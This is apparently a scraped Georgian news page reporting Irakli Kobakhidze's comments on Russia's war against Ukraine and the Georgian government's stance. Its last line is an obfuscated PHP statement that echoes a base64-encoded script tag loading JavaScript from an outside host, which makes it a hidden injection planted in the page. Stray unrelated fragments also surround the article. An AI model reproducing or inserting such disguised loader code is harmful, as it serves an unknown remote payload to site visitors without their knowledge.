celsiusi
ავერსი საქკაბელი
ქართული ოცნების თავმჯდომარე დღეს გამართულ ბრიფინგზე უკრაინაში განვითარებულ მოვლენებს და ამასთან დაკავშირებით საქართველოს მთავრობის პოზიციას გამოეხმაურა. ირაკლი კობახიძის თქმით, საქართველოს ხელისუფლება ყველაფერს აკეთებს იმისთვის, რომ ქვეყანას აარიდოს ის მდგომარეობა, რაც ახლა უკრაინაშია. მისი თქმით, ამის შესახებ ისაუბრა ქვეყნის პრემიერმაც, რომლიც განცხადებასაც ოპოზციის მხრიდან სპეკულაციები მოჰყვა.
 
"უკრაინის მიერ მიღებული ზიანი, სამწუხაროდ არის უმძიმესი და რა თქმა უნდა, ის რაც ხორციელდება სამხედრო აგრესიის სახით რუსეთის მხრიდან უკრაინის სახელმწიფოს და უკრაინელების მიმართ არის რა თქმა უნდა, დასჯის აქტი და აქ ჩვენ მოვისმინეთ უამრავი სპეკულაცია, სასჯელი შეიძლება იყოს სამართლიანიც და უსამართლოც, ვერავითარი უარყოფითი კონტექსტი ვერ მიეცემა იმ ფრაზას, რომელიც წარმოთქვა პრემიერმა. 
 
რა თქმა უნდა, აქ საუბარია უკრაინის დასჯაზე რუსული სამხედრო აგრესიის სახით, რასაც არ აქვს არავითარი გამართლება და კიდევ ერთხელ გავიმეორებთ, რომ უმძიმესი ზიანი მიადგა სამწუხაროდ ჩვენს მეგობარ ქვეყანას, ჩვენ მეგობარ ხალხს, უკრაინას. ძალიან რთულია ის მდგომარეობა, რომელშიც  არის ეს სახელმწიფო დღეს. თქვენ იცით, რომ ყველა თვალსაზრისით ზიანი, იქნება ეს ეკონომიკური, ინფრასტრუქტურული, სამხედრო თუ ნებისმიერი სხვა, არის ძალიან მძიმე და ასევე ამ ქვეყანას, მის ხელისუფლებას უკვე მოუწია უარის თქმა ნატოზე, რაც იყო მისი მხრიდან სასტარტო შეთავაზება რუსეთის მიმართ, წარმოიდგინეთ. ეს არის რა თქმა უნდა, უმძიმესი მდგომარეობა, შესაბამისად სახეზეა ეს მოცემულობა, რაც არის ძალიან სამწუხარო ჩვენთვის და ჩვენი ამოცანაა, ბუნებრივია, ეს ყველაფერი ავარიდოთ ჩვენს ქვეყანას.
 
გუშინ მოვისმინე ერთ-ერთი ოპოზიციონერის, ომის პარტიის წევრის ფრაზა იმის შესახებ, რომ თუ ვინმე დღეს არ არის დასჯილი და დაჩაგრული ეს არის უკრაინა. ამით ისინი ცდილობენ, რომ გაამართლონ საკუთარი განზრახვა და ეს განზრახვა არის ერთადერთი - რამენაირად საქართველო ჩართონ იმ სამხედრო კონფლიქტში რომელიც ახლა წარმოებს უკრაინაში. რა თქმა უნდა, ეს არის აბსოლუტურად აცდენილი სინამდვილეს. ვითარება არის ძალიან მძიმე უკრაინაში და ჩვენ ყველაფერი უნდა გავაკეთოთ იმისთვის, რომ ეს მდგომარეობა ავარიდოთ ჩვენ ქვეყანას და ჩვენ მოსახლეობას," - განაცხადა ირაკლი კობახიძემ.
789
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");